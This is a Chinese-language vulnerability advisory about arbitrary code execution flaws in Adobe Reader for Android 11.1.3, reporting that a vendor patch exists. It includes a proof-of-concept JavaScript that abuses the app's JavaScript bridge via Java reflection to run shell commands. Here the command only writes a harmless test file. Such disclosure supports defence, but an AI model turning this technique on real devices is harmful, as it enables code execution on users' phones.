Adobe Reader for Android多个任意代码执行漏洞

发布日期:2014-04-14
更新日期:2014-04-15

受影响系统:
Adobe Reader for Android
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 66798
 
Adobe Reader for Android是Android 和iOS 设备(包括iPad 和iPhone)上使用的免费Adobe Reader移动应用程序。
 
Adobe Reader for Android 11.1.3在实现上存在多个任意代码执行漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码。
 
<*来源:Yorick Koster
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
function execute(bridge, cmd) {
    return bridge.getClass().forName('java.lang.Runtime')
      .getMethod('getRuntime',null).invoke(null,null).exec(cmd);
 }
 
if(window._app) {
    try {
      var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
      execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);
      window._app.alert(path + ' created', 3);
    } catch(e) {
      window._app.alert(e, 0);
    }
 }

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Adobe
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/8345b888d5131d2261ce4b14f2d709cd.html